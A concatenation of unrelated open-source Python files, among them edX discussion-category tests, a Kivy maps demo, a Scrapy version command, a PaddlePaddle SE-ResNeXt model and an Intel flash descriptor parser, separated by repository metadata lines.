self.course.cohort_config = {"cohorted": True, "cohorted_discussions": ["Topic_A", "Some_Other_Topic"]}
check_cohorted_topics(["Topic_A"])
# unlikely case, but make sure it works.
self.course.cohort_config = {"cohorted": False, "cohorted_discussions": ["Topic_A"]}
check_cohorted_topics([])
def test_single_inline(self):
self.create_discussion("Chapter", "Discussion")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion": {
"id": "discussion1",
"sort_key": None,
"is_cohorted": False,
}
},
"subcategories": {},
"children": ["Discussion"]
}
},
"children": ["Chapter"]
}
)
def test_tree(self):
self.create_discussion("Chapter 1", "Discussion 1")
self.create_discussion("Chapter 1", "Discussion 2")
self.create_discussion("Chapter 2", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion")
self.create_discussion("Chapter 3 / Section 1", "Discussion")
def check_cohorted(is_cohorted):
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter 1": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": None,
"is_cohorted": is_cohorted,
},
"Discussion 2": {
"id": "discussion2",
"sort_key": None,
"is_cohorted": is_cohorted,
}
},
"subcategories": {},
"children": ["Discussion 1", "Discussion 2"]
},
"Chapter 2": {
"entries": {
"Discussion": {
"id": "discussion3",
"sort_key": None,
"is_cohorted": is_cohorted,
}
},
"subcategories": {
"Section 1": {
"entries": {},
"subcategories": {
"Subsection 1": {
"entries": {
"Discussion": {
"id": "discussion4",
"sort_key": None,
"is_cohorted": is_cohorted,
}
},
"subcategories": {},
"children": ["Discussion"]
},
"Subsection 2": {
"entries": {
"Discussion": {
"id": "discussion5",
"sort_key": None,
"is_cohorted": is_cohorted,
}
},
"subcategories": {},
"children": ["Discussion"]
}
},
"children": ["Subsection 1", "Subsection 2"]
}
},
"children": ["Discussion", "Section 1"]
},
"Chapter 3": {
"entries": {},
"subcategories": {
"Section 1": {
"entries": {
"Discussion": {
"id": "discussion6",
"sort_key": None,
"is_cohorted": is_cohorted,
}
},
"subcategories": {},
"children": ["Discussion"]
}
},
"children": ["Section 1"]
}
},
"children": ["Chapter 1", "Chapter 2", "Chapter 3"]
}
)
# empty / default config
check_cohorted(False)
# explicitly disabled cohorting
self.course.cohort_config = {"cohorted": False}
check_cohorted(False)
# explicitly enabled cohorting
self.course.cohort_config = {"cohorted": True}
check_cohorted(True)
def test_start_date_filter(self):
now = datetime.now()
later = datetime.max
self.create_discussion("Chapter 1", "Discussion 1", start=now)
self.create_discussion("Chapter 1", "Discussion 2 обсуждение", start=later)
self.create_discussion("Chapter 2", "Discussion", start=now)
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion", start=later)
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion", start=later)
self.create_discussion("Chapter 3 / Section 1", "Discussion", start=later)
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter 1": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": None,
"is_cohorted": False,
}
},
"subcategories": {},
"children": ["Discussion 1"]
},
"Chapter 2": {
"entries": {
"Discussion": {
"id": "discussion3",
"sort_key": None,
"is_cohorted": False,
}
},
"subcategories": {},
"children": ["Discussion"]
}
},
"children": ["Chapter 1", "Chapter 2"]
}
)
def test_sort_inline_explicit(self):
self.create_discussion("Chapter", "Discussion 1", sort_key="D")
self.create_discussion("Chapter", "Discussion 2", sort_key="A")
self.create_discussion("Chapter", "Discussion 3", sort_key="E")
self.create_discussion("Chapter", "Discussion 4", sort_key="C")
self.create_discussion("Chapter", "Discussion 5", sort_key="B")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion 1": {
"id": "discussion1",
"sort_key": "D",
"is_cohorted": False,
},
"Discussion 2": {
"id": "discussion2",
"sort_key": "A",
"is_cohorted": False,
},
"Discussion 3": {
"id": "discussion3",
"sort_key": "E",
"is_cohorted": False,
},
"Discussion 4": {
"id": "discussion4",
"sort_key": "C",
"is_cohorted": False,
},
"Discussion 5": {
"id": "discussion5",
"sort_key": "B",
"is_cohorted": False,
}
},
"subcategories": {},
"children": [
"Discussion 2",
"Discussion 5",
"Discussion 4",
"Discussion 1",
"Discussion 3"
]
}
},
"children": ["Chapter"]
}
)
def test_sort_configured_topics_explicit(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A", "sort_key": "B"},
"Topic B": {"id": "Topic_B", "sort_key": "C"},
"Topic C": {"id": "Topic_C", "sort_key": "A"}
}
self.assert_category_map_equals(
{
"entries": {
"Topic A": {"id": "Topic_A", "sort_key": "B", "is_cohorted": False},
"Topic B": {"id": "Topic_B", "sort_key": "C", "is_cohorted": False},
"Topic C": {"id": "Topic_C", "sort_key": "A", "is_cohorted": False},
},
"subcategories": {},
"children": ["Topic C", "Topic A", "Topic B"]
}
)
def test_sort_alpha(self):
self.course.discussion_sort_alpha = True
self.course.save()
self.create_discussion("Chapter", "Discussion D")
self.create_discussion("Chapter", "Discussion A")
self.create_discussion("Chapter", "Discussion E")
self.create_discussion("Chapter", "Discussion C")
self.create_discussion("Chapter", "Discussion B")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter": {
"entries": {
"Discussion D": {
"id": "discussion1",
"sort_key": "Discussion D",
"is_cohorted": False,
},
"Discussion A": {
"id": "discussion2",
"sort_key": "Discussion A",
"is_cohorted": False,
},
"Discussion E": {
"id": "discussion3",
"sort_key": "Discussion E",
"is_cohorted": False,
},
"Discussion C": {
"id": "discussion4",
"sort_key": "Discussion C",
"is_cohorted": False,
},
"Discussion B": {
"id": "discussion5",
"sort_key": "Discussion B",
"is_cohorted": False,
}
},
"subcategories": {},
"children": [
"Discussion A",
"Discussion B",
"Discussion C",
"Discussion D",
"Discussion E"
]
}
},
"children": ["Chapter"]
}
)
def test_sort_intermediates(self):
self.create_discussion("Chapter B", "Discussion 2")
self.create_discussion("Chapter C", "Discussion")
self.create_discussion("Chapter A", "Discussion 1")
self.create_discussion("Chapter B", "Discussion 1")
self.create_discussion("Chapter A", "Discussion 2")
self.assert_category_map_equals(
{
"entries": {},
"subcategories": {
"Chapter A": {
"entries": {
"Discussion 1": {
"id": "discussion3",
"sort_key": None,
"is_cohorted": False,
},
"Discussion 2": {
"id": "discussion5",
"sort_key": None,
"is_cohorted": False,
}
},
"subcategories": {},
"children": ["Discussion 1", "Discussion 2"]
},
"Chapter B": {
"entries": {
"Discussion 1": {
"id": "discussion4",
"sort_key": None,
"is_cohorted": False,
},
"Discussion 2": {
"id": "discussion1",
"sort_key": None,
"is_cohorted": False,
}
},
"subcategories": {},
"children": ["Discussion 1", "Discussion 2"]
},
"Chapter C": {
"entries": {
"Discussion": {
"id": "discussion2",
"sort_key": None,
"is_cohorted": False,
}
},
"subcategories": {},
"children": ["Discussion"]
}
},
"children": ["Chapter A", "Chapter B", "Chapter C"]
}
)
def test_ids_empty(self):
self.assertEqual(utils.get_discussion_categories_ids(self.course, self.user), [])
def test_ids_configured_topics(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A"},
"Topic B": {"id": "Topic_B"},
"Topic C": {"id": "Topic_C"}
}
self.assertItemsEqual(
utils.get_discussion_categories_ids(self.course, self.user),
["Topic_A", "Topic_B", "Topic_C"]
)
def test_ids_inline(self):
self.create_discussion("Chapter 1", "Discussion 1")
self.create_discussion("Chapter 1", "Discussion 2")
self.create_discussion("Chapter 2", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 2", "Discussion")
self.create_discussion("Chapter 3 / Section 1", "Discussion")
self.assertItemsEqual(
utils.get_discussion_categories_ids(self.course, self.user),
["discussion1", "discussion2", "discussion3", "discussion4", "discussion5", "discussion6"]
)
def test_ids_mixed(self):
self.course.discussion_topics = {
"Topic A": {"id": "Topic_A"},
"Topic B": {"id": "Topic_B"},
"Topic C": {"id": "Topic_C"}
}
self.create_discussion("Chapter 1", "Discussion 1")
self.create_discussion("Chapter 2", "Discussion")
self.create_discussion("Chapter 2 / Section 1 / Subsection 1", "Discussion")
self.assertItemsEqual(
utils.get_discussion_categories_ids(self.course, self.user),
["Topic_A", "Topic_B", "Topic_C", "discussion1", "discussion2", "discussion3"]
)
class ContentGroupCategoryMapTestCase(CategoryMapTestMixin, ContentGroupTestCase):
"""
Tests `get_discussion_category_map` on discussion modules which are
only visible to some content groups.
"""
def test_staff_user(self):
"""
Verify that the staff user can access the alpha, beta, and
global discussion topics.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
'Visible to Alpha',
'Visible to Beta',
'Visible to Everyone'
],
'entries': {
'Visible to Alpha': {
'sort_key': None,
'is_cohorted': True,
'id': 'alpha_group_discussion'
},
'Visible to Beta': {
'sort_key': None,
'is_cohorted': True,
'id': 'beta_group_discussion'
},
'Visible to Everyone': {
'sort_key': None,
'is_cohorted': True,
'id': 'global_group_discussion'
}
}
}
},
'children': ['General', 'Week 1'],
'entries': {
'General': {
'sort_key': 'General',
'is_cohorted': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.staff_user
)
def test_alpha_user(self):
"""
Verify that the alpha user can access the alpha and global
discussion topics.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
'Visible to Alpha',
'Visible to Everyone'
],
'entries': {
'Visible to Alpha': {
'sort_key': None,
'is_cohorted': True,
'id': 'alpha_group_discussion'
},
'Visible to Everyone': {
'sort_key': None,
'is_cohorted': True,
'id': 'global_group_discussion'
}
}
}
},
'children': ['General', 'Week 1'],
'entries': {
'General': {
'sort_key': 'General',
'is_cohorted': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.alpha_user
)
def test_beta_user(self):
"""
Verify that the beta user can access the beta and global
discussion topics.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
'Visible to Beta',
'Visible to Everyone'
],
'entries': {
'Visible to Beta': {
'sort_key': None,
'is_cohorted': True,
'id': 'beta_group_discussion'
},
'Visible to Everyone': {
'sort_key': None,
'is_cohorted': True,
'id': 'global_group_discussion'
}
}
}
},
'children': ['General', 'Week 1'],
'entries': {
'General': {
'sort_key': 'General',
'is_cohorted': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.beta_user
)
def test_non_cohorted_user(self):
"""
Verify that the non-cohorted user can access the global
discussion topic.
"""
self.assert_category_map_equals(
{
'subcategories': {
'Week 1': {
'subcategories': {},
'children': [
'Visible to Everyone'
],
'entries': {
'Visible to Everyone': {
'sort_key': None,
'is_cohorted': True,
'id': 'global_group_discussion'
}
}
}
},
'children': ['General', 'Week 1'],
'entries': {
'General': {
'sort_key': 'General',
'is_cohorted': False,
'id': 'i4x-org-number-course-run'
}
}
},
requesting_user=self.non_cohorted_user
)
class JsonResponseTestCase(TestCase, UnicodeTestMixin):
def _test_unicode_data(self, text):
response = utils.JsonResponse(text)
reparsed = json.loads(response.content)
self.assertEqual(reparsed, text)
class RenderMustacheTests(TestCase):
"""
Test the `render_mustache` utility function.
"""
@mock.patch('edxmako.LOOKUP', {})
def test_it(self):
"""
Basic test.
"""
add_lookup('main', '', package=__name__)
self.assertEqual(utils.render_mustache('test.mustache', {}), 'Testing 1 2 3.\n')
|
mtlchun/edx
|
lms/djangoapps/django_comment_client/tests/test_utils.py
|
Python
|
agpl-3.0
| 33,221 | 0.001355 |
__version__ = '1.3'
from kivy.app import App
from kivy.lang import Builder
from kivy.properties import NumericProperty
from gmaps import GMap, run_on_ui_thread
gmap_kv = '''
<Toolbar@BoxLayout>:
size_hint_y: None
height: '48dp'
padding: '4dp'
spacing: '4dp'
canvas:
Color:
rgba: .2, .2, .2, .6
Rectangle:
pos: self.pos
size: self.size
FloatLayout:
GMap:
id: map_widget
# top toolbar
Toolbar:
pos_hint: {'top': 1}
Button:
text: 'Move to Lille, France'
on_release: app.move_to_lille()
Button:
text: 'Move to Sydney, Autralia'
on_release: app.move_to_sydney()
# bottom toolbar
Toolbar:
Label:
text: 'Longitude: {} - Latitude: {}'.format(app.longitude, app.latitude)
'''
class GMapTestApp(App):
latitude = NumericProperty()
longitude = NumericProperty()
def build(self):
self.root = Builder.load_string(gmap_kv)
self.map_widget = self.root.ids.map_widget
self.map_widget.bind(
on_ready=self.on_map_widget_ready,
on_map_click=self.on_map_click)
def on_map_widget_ready(self, map_widget, *args):
# Implementation of the "Hello Map" example from the android
# documentation
map = map_widget.map
sydney = map_widget.create_latlng(-33.867, 151.206)
#map.setMyLocationEnabled(True)
map.moveCamera(map_widget.camera_update_factory.newLatLngZoom(
sydney, 13))
marker = self.map_widget.create_marker(
title='Sydney',
snippet='The most populous city in Autralia',
position=sydney)
map.addMarker(marker)
circle = map_widget.create_circle(
sydney
)
map.addCircle(circle)
# disable zoom button
map.getUiSettings().setZoomControlsEnabled(False)
@run_on_ui_thread
def move_to_lille(self):
latlng = self.map_widget.create_latlng(50.6294, 3.057)
self.map_widget.map.moveCamera(
self.map_widget.camera_update_factory.newLatLngZoom(
latlng, 13))
@run_on_ui_thread
def move_to_sydney(self):
latlng = self.map_widget.create_latlng(-33.867, 151.206)
self.map_widget.map.moveCamera(
self.map_widget.camera_update_factory.newLatLngZoom(
latlng, 13))
circle = self.map_widget.create_circle( latlng)
self.map_widget.map.addCircle(circle)
def on_map_click(self, map_widget, latlng):
self.latitude = latlng.latitude
self.longitude = latlng.longitude
def on_pause(self):
return True
if __name__ == '__main__':
GMapTestApp().run()
|
SwordGO/SwordGO_app
|
example/kivy-gmaps/main.py
|
Python
|
gpl-3.0
| 2,807 | 0.00285 |
import sys
import platform
import twisted
import scrapy
from scrapy.command import ScrapyCommand
class Command(ScrapyCommand):
def syntax(self):
return "[-v]"
def short_desc(self):
return "Print Scrapy version"
def add_options(self, parser):
ScrapyCommand.add_options(self, parser)
parser.add_option("--verbose", "-v", dest="verbose", action="store_true",
help="also display twisted/python/platform info (useful for bug reports)")
def run(self, args, opts):
if opts.verbose:
try:
import lxml.etree
except ImportError:
lxml_version = libxml2_version = "(lxml not available)"
else:
lxml_version = ".".join(map(str, lxml.etree.LXML_VERSION))
libxml2_version = ".".join(map(str, lxml.etree.LIBXML_VERSION))
print "Scrapy : %s" % scrapy.__version__
print "lxml : %s" % lxml_version
print "libxml2 : %s" % libxml2_version
print "Twisted : %s" % twisted.version.short()
print "Python : %s" % sys.version.replace("\n", "- ")
print "Platform: %s" % platform.platform()
else:
print "Scrapy %s" % scrapy.__version__
|
pablohoffman/scrapy
|
scrapy/commands/version.py
|
Python
|
bsd-3-clause
| 1,277 | 0.003132 |
#!/usr/bin/env python
# pykram
#
# Created by nicerobot on 2012-02-03.
# Copyright (c) 2012 Nice Robot Corporation. All rights reserved.
#
# This file is part of pykram.
#
# pykram is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pykram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pykram. If not, see <http://www.gnu.org/licenses/>.
#
__date__ = '2011.05.04'
__version__ = '1.0'
__doc__= """
This is pyelyts.py - a Python module that makes it easier
to generate cascading style sheets the pythonic way.
Version: %s as of %s.
""" % ( __version__, __date__ )
import re
import string
class properties(dict):
def __call__( self, **props ):
for key, value in props.iteritems():
if '_' == key[-1]:
key = key.replace('_','-')
key = key.strip('-')
self[key] = value
def __str__(self):
return ';'.join(['%s:%s' % (k,v) for k,v in self.iteritems()])
class document:
def __init__( self, indent=True ):
self.indent = indent
self.selectors = []
def __call__( self, *selectors ):
p=properties()
self.selectors.append((','.join(selectors),p))
return p
def __str__(self):
return '%s\n' % '\n'.join(['%s{%s}' % (s,p) for (s,p) in self.selectors])
if __name__ == '__main__':
print __doc__
|
pombredanne/pykram
|
src/main/py/pyelyts.py
|
Python
|
gpl-3.0
| 1,729 | 0.019665 |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.fluid as fluid
import math
import os
from imagenet_reader import train, val
__all__ = [
"SE_ResNeXt", "SE_ResNeXt50_32x4d", "SE_ResNeXt101_32x4d",
"SE_ResNeXt152_32x4d", "get_model"
]
train_parameters = {
"input_size": [3, 224, 224],
"input_mean": [0.485, 0.456, 0.406],
"input_std": [0.229, 0.224, 0.225],
"learning_strategy": {
"name": "piecewise_decay",
"batch_size": 256,
"epochs": [30, 60, 90],
"steps": [0.1, 0.01, 0.001, 0.0001]
}
}
class SE_ResNeXt():
def __init__(self, layers=50, is_train=True):
self.params = train_parameters
self.layers = layers
self.is_train = is_train
def net(self, input, class_dim=1000):
layers = self.layers
supported_layers = [50, 101, 152]
assert layers in supported_layers, \
"supported layers are {} but input layer is {}".format(supported_layers, layers)
if layers == 50:
cardinality = 32
reduction_ratio = 16
depth = [3, 4, 6, 3]
num_filters = [128, 256, 512, 1024]
conv = self.conv_bn_layer(
input=input,
num_filters=64,
filter_size=7,
stride=2,
act='relu')
conv = fluid.layers.pool2d(
input=conv,
pool_size=3,
pool_stride=2,
pool_padding=1,
pool_type='max')
elif layers == 101:
cardinality = 32
reduction_ratio = 16
depth = [3, 4, 23, 3]
num_filters = [128, 256, 512, 1024]
conv = self.conv_bn_layer(
input=input,
num_filters=64,
filter_size=7,
stride=2,
act='relu')
conv = fluid.layers.pool2d(
input=conv,
pool_size=3,
pool_stride=2,
pool_padding=1,
pool_type='max')
elif layers == 152:
cardinality = 64
reduction_ratio = 16
depth = [3, 8, 36, 3]
num_filters = [128, 256, 512, 1024]
conv = self.conv_bn_layer(
input=input,
num_filters=64,
filter_size=3,
stride=2,
act='relu')
conv = self.conv_bn_layer(
input=conv, num_filters=64, filter_size=3, stride=1, act='relu')
conv = self.conv_bn_layer(
input=conv,
num_filters=128,
filter_size=3,
stride=1,
act='relu')
conv = fluid.layers.pool2d(
input=conv, pool_size=3, pool_stride=2, pool_padding=1, \
pool_type='max')
for block in range(len(depth)):
for i in range(depth[block]):
conv = self.bottleneck_block(
input=conv,
num_filters=num_filters[block],
stride=2 if i == 0 and block != 0 else 1,
cardinality=cardinality,
reduction_ratio=reduction_ratio)
pool = fluid.layers.pool2d(
input=conv, pool_size=7, pool_type='avg', global_pooling=True)
drop = fluid.layers.dropout(x=pool, dropout_prob=0.5)
stdv = 1.0 / math.sqrt(drop.shape[1] * 1.0)
out = fluid.layers.fc(input=drop,
size=class_dim,
act='softmax',
param_attr=fluid.param_attr.ParamAttr(
initializer=fluid.initializer.Uniform(-stdv,
stdv)))
return out
def shortcut(self, input, ch_out, stride):
ch_in = input.shape[1]
if ch_in != ch_out or stride != 1:
filter_size = 1
return self.conv_bn_layer(input, ch_out, filter_size, stride)
else:
return input
def bottleneck_block(self, input, num_filters, stride, cardinality,
reduction_ratio):
conv0 = self.conv_bn_layer(
input=input, num_filters=num_filters, filter_size=1, act='relu')
conv1 = self.conv_bn_layer(
input=conv0,
num_filters=num_filters,
filter_size=3,
stride=stride,
groups=cardinality,
act='relu')
conv2 = self.conv_bn_layer(
input=conv1, num_filters=num_filters * 2, filter_size=1, act=None)
scale = self.squeeze_excitation(
input=conv2,
num_channels=num_filters * 2,
reduction_ratio=reduction_ratio)
short = self.shortcut(input, num_filters * 2, stride)
return fluid.layers.elementwise_add(x=short, y=scale, act='relu')
def conv_bn_layer(self,
input,
num_filters,
filter_size,
stride=1,
groups=1,
act=None):
conv = fluid.layers.conv2d(
input=input,
num_filters=num_filters,
filter_size=filter_size,
stride=stride,
padding=(filter_size - 1) / 2,
groups=groups,
act=None,
bias_attr=False)
return fluid.layers.batch_norm(
input=conv, act=act, is_test=not self.is_train)
def squeeze_excitation(self, input, num_channels, reduction_ratio):
pool = fluid.layers.pool2d(
input=input, pool_size=0, pool_type='avg', global_pooling=True)
stdv = 1.0 / math.sqrt(pool.shape[1] * 1.0)
squeeze = fluid.layers.fc(input=pool,
size=num_channels / reduction_ratio,
act='relu',
param_attr=fluid.param_attr.ParamAttr(
initializer=fluid.initializer.Uniform(
-stdv, stdv)))
stdv = 1.0 / math.sqrt(squeeze.shape[1] * 1.0)
excitation = fluid.layers.fc(input=squeeze,
size=num_channels,
act='sigmoid',
param_attr=fluid.param_attr.ParamAttr(
initializer=fluid.initializer.Uniform(
-stdv, stdv)))
scale = fluid.layers.elementwise_mul(x=input, y=excitation, axis=0)
return scale
def SE_ResNeXt50_32x4d():
model = SE_ResNeXt(layers=50)
return model
def SE_ResNeXt101_32x4d():
model = SE_ResNeXt(layers=101)
return model
def SE_ResNeXt152_32x4d():
model = SE_ResNeXt(layers=152)
return model
def get_model(args, is_train, main_prog, startup_prog):
model = SE_ResNeXt(layers=50)
batched_reader = None
pyreader = None
trainer_count = int(os.getenv("PADDLE_TRAINERS"))
dshape = train_parameters["input_size"]
with fluid.program_guard(main_prog, startup_prog):
with fluid.unique_name.guard():
if args.use_reader_op:
pyreader = fluid.layers.py_reader(
capacity=10,
shapes=([-1] + dshape, (-1, 1)),
dtypes=('float32', 'int64'),
name="train_reader" if is_train else "test_reader",
use_double_buffer=True)
input, label = fluid.layers.read_file(pyreader)
else:
input = fluid.layers.data(
name='data', shape=dshape, dtype='float32')
label = fluid.layers.data(
name='label', shape=[1], dtype='int64')
out = model.net(input=input)
cost = fluid.layers.cross_entropy(input=out, label=label)
avg_cost = fluid.layers.mean(x=cost)
acc_top1 = fluid.layers.accuracy(input=out, label=label, k=1)
acc_top5 = fluid.layers.accuracy(input=out, label=label, k=5)
optimizer = None
if is_train:
total_images = 1281167 / trainer_count
step = int(total_images / args.batch_size + 1)
epochs = [40, 80, 100]
bd = [step * e for e in epochs]
base_lr = args.learning_rate
lr = []
lr = [base_lr * (0.1**i) for i in range(len(bd) + 1)]
optimizer = fluid.optimizer.Momentum(
# learning_rate=base_lr,
learning_rate=fluid.layers.piecewise_decay(
boundaries=bd, values=lr),
momentum=0.9,
regularization=fluid.regularizer.L2Decay(1e-4))
optimizer.minimize(avg_cost)
if args.memory_optimize:
fluid.memory_optimize(main_prog)
# config readers
if is_train:
reader = train()
else:
reader = val()
if not args.use_reader_op:
batched_reader = paddle.batch(
reader, batch_size=args.batch_size * args.gpus, drop_last=True)
else:
pyreader.decorate_paddle_reader(
paddle.batch(
reader, batch_size=args.batch_size))
return avg_cost, optimizer, [acc_top1, acc_top5], batched_reader, pyreader
|
reyoung/Paddle
|
benchmark/fluid/models/se_resnext.py
|
Python
|
apache-2.0
| 10,123 | 0.000296 |
#!/usr/bin/env python3
"""
Test for Hintidentifier
"""
import datetime
import unittest
from base_test import PschedTestBase
from pscheduler.limitprocessor.identifier.hint import *
DATA = {
"hint": "value",
"match": {
"style": "exact",
"match": "testing",
"case-insensitive": False
}
}
HINTS_HIT = {
"value": "testing"
}
HINTS_MISS = {
"value": "not-testing"
}
class TestLimitprocessorIdentifierAlways(PschedTestBase):
"""
Test the Identifier
"""
def test_data_is_valid(self):
"""Limit Processor / Identifier Hint / Data Validation"""
self.assertEqual(data_is_valid(DATA), (True, "OK"))
self.assertEqual(data_is_valid({}), (False, "At /: 'hint' is a required property"))
self.assertRaises(ValueError, data_is_valid, 123)
def test_identifier(self):
"""Limit Processor / Identifier Hint / Identifier"""
ident = IdentifierHint(DATA)
self.assertEqual(ident.evaluate(HINTS_HIT), True)
self.assertEqual(ident.evaluate(HINTS_MISS), False)
if __name__ == '__main__':
unittest.main()
|
perfsonar/pscheduler
|
python-pscheduler/pscheduler/tests/limitprocessor_identifier_hint_test.py
|
Python
|
apache-2.0
| 1,127 | 0.002662 |
# -*- coding: utf-8 -*-
class Condition(object):
operator = ''
def __init__(self, operator):
super(Condition, self).__init__()
self.operator = operator
def equal(self, value1, value2):
return (str(value1) == str(value2))
def nequal(self, value1, value2):
return (str(value1) != str(value2))
def gthan(self, value1, value2):
return (float(value1) > float(value2))
def lthan(self, value1, value2):
return (float(value1) < float(value2))
def test(self, value1, value2):
if (self.operator == 'equal'):
return self.equal(value1, value2)
elif(self.operator == 'nequal'):
return self.nequal(value1, value2)
elif(self.operator == 'gthan'):
return self.gthan(value1, value2)
elif(self.operator == 'lthan'):
return self.lthan(value1, value2)
return False
|
OpenSpaceProgram/pyOSP
|
library/components/Condition.py
|
Python
|
mit
| 917 | 0.001091 |
"""
Utils module tests.
"""
import shutil
from unittest import TestCase
from microtbs_rl import envs
from microtbs_rl.utils.exploration import LinearDecay
from microtbs_rl.utils.record_policy_execution import record
from microtbs_rl.utils.common_utils import get_test_logger, experiment_dir
from microtbs_rl.algorithms import a2c
logger = get_test_logger()
class ExplorationTests(TestCase):
def test_linear_decay(self):
schedule = LinearDecay(milestones=[])
self.assertAlmostEqual(schedule.at(0), 1)
self.assertAlmostEqual(schedule.at(1), 0)
self.assertAlmostEqual(schedule.at(0.3), 0.7)
self.assertAlmostEqual(schedule.at(0.5), 0.5)
self.assertAlmostEqual(schedule.at(0.7), 0.3)
schedule = LinearDecay(milestones=[(0.5, 0)])
self.assertAlmostEqual(schedule.at(0), 1)
self.assertAlmostEqual(schedule.at(1), 0)
self.assertAlmostEqual(schedule.at(0.25), 0.5)
self.assertAlmostEqual(schedule.at(0.5), 0)
self.assertAlmostEqual(schedule.at(0.7), 0)
schedule = LinearDecay(milestones=[(0.4, 0.2), (0.8, 0.1)])
self.assertAlmostEqual(schedule.at(0), 1)
self.assertAlmostEqual(schedule.at(1), 0)
self.assertAlmostEqual(schedule.at(0.1), 0.8)
self.assertAlmostEqual(schedule.at(0.4), 0.2)
self.assertAlmostEqual(schedule.at(0.6), 0.15)
self.assertAlmostEqual(schedule.at(0.9), 0.05)
class RenderGifTests(TestCase):
def test_render_gif(self):
experiment_name = 'gif_test'
test_env = envs.COLLECT_WITH_TERRAIN_LATEST
a2c_params = a2c.AgentA2C.Params(experiment_name)
a2c_params.train_for_steps = 10
a2c_params.save_every = a2c_params.train_for_steps - 1
self.assertEqual(a2c.train_a2c.train(a2c_params, test_env), 0)
self.assertEqual(record(experiment_name, test_env, save_as_gif=True, num_episodes=1), 0)
shutil.rmtree(experiment_dir(experiment_name))
|
alex-petrenko/hierarchical-rl
|
microtbs_rl/utils/tests/test_utils.py
|
Python
|
mit
| 1,981 | 0.000505 |
"""
ICH flash descriptor
"""
import struct
from raw import RAW
from fd import FD
_SIG = '5AA5F00F'.decode('hex')
_SIG_OFFSET = 0x10
_SIG_SIZE = 0x4
_S_HEADER = struct.Struct('< 16s 4s BBBB BBBB BBBB')
_S_REGION = struct.Struct('< H H')
_REGIONS = [('ich', RAW), ('bios', FD), ('me', RAW), ('gbe', RAW), ('plat', RAW)]
class ICHDesc(object):
def __init__(self, data, start, prefix=''):
self.start = start
self.prefix = prefix
offset = 0
(self.rsvd, self.flvalsig, fcba, nc, frba, nr, fmba, nm, fpsba, isl,
fmsba, psl, _, _) = _S_HEADER.unpack_from(data, offset)
offset += _S_HEADER.size
if self.flvalsig != _SIG:
raise ValueError('bad magic %s' % repr(self.flvalsig))
self.fcba = fcba << 4
self.nc = nc + 1
self.frba = frba << 4
self.nr = nr + 1
self.fmba = fmba << 4
self.nm = nm + 1
self.fpsba = fpsba << 4
self.isl = isl
self.fmsba = fmsba << 4
self.psl = psl
self.blocks = []
self.regions = []
offset = self.frba
region_size = 0
for name, class_ in _REGIONS:
(base, limit) = _S_REGION.unpack_from(data, offset)
offset += _S_REGION.size
if limit >= base:
base = base << 12
limit = (limit << 12) | 0xfff
region_size += limit - base + 1
cur_prefix = '%s%s_' % (prefix, name)
self.blocks.append(class_(data[base:limit + 1], start + base, cur_prefix))
else:
base = None
limit = None
self.blocks.append(None)
self.regions.append((base, limit))
self.size = region_size
def __str__(self):
return '0x%08x+0x%08x: ICH' % (self.start, self.size)
def showinfo(self, ts=' '):
print ts + 'Size: 0x%x' % self.size
print ts + 'Reserved: %s' % (' '.join('%02x' % ord(c) for c in self.rsvd))
print ts + 'FR: 0x%03x %2d' % (self.frba, self.nr)
print ts + 'FC: 0x%03x %2d' % (self.fcba, self.nc)
print ts + 'FPS: 0x%03x %2d' % (self.fpsba, self.isl)
print ts + 'FM: 0x%03x %2d' % (self.fmba, self.nm)
print ts + 'FMS: 0x%03x %2d' % (self.fmsba, self.psl)
print ts + 'Regions:'
for index, (name, _) in enumerate(_REGIONS):
(base, limit) = self.regions[index]
if base is None:
print ts + ' ' + '%4s:-' % name
else:
print ts + ' ' + '%4s:0x%06x:0x%06x' % (name, base, limit)
for block in self.blocks:
if block:
print ts + str(block)
block.showinfo(ts + ' ')
def dump(self):
for block in self.blocks:
if block:
block.dump()
@staticmethod
def check_sig(data, offset=0):
offset += _SIG_OFFSET
return data[offset:offset + _SIG_SIZE] == _SIG
|
fesh0r/romdump
|
ichdesc.py
|
Python
|
mit
| 3,000 | 0.001 |
"""All permissions are defined here.
They are also defined in permissions.zcml.
The two files must be kept in sync.
"""
# Add Permissions:
AddCountry = 'BIKA: Add Country'
AddRegion = 'BIKA: Add Region'
AddCultivar = 'BIKA: Add Cultivar'
AddWineType = 'BIKA: Add Wine type'
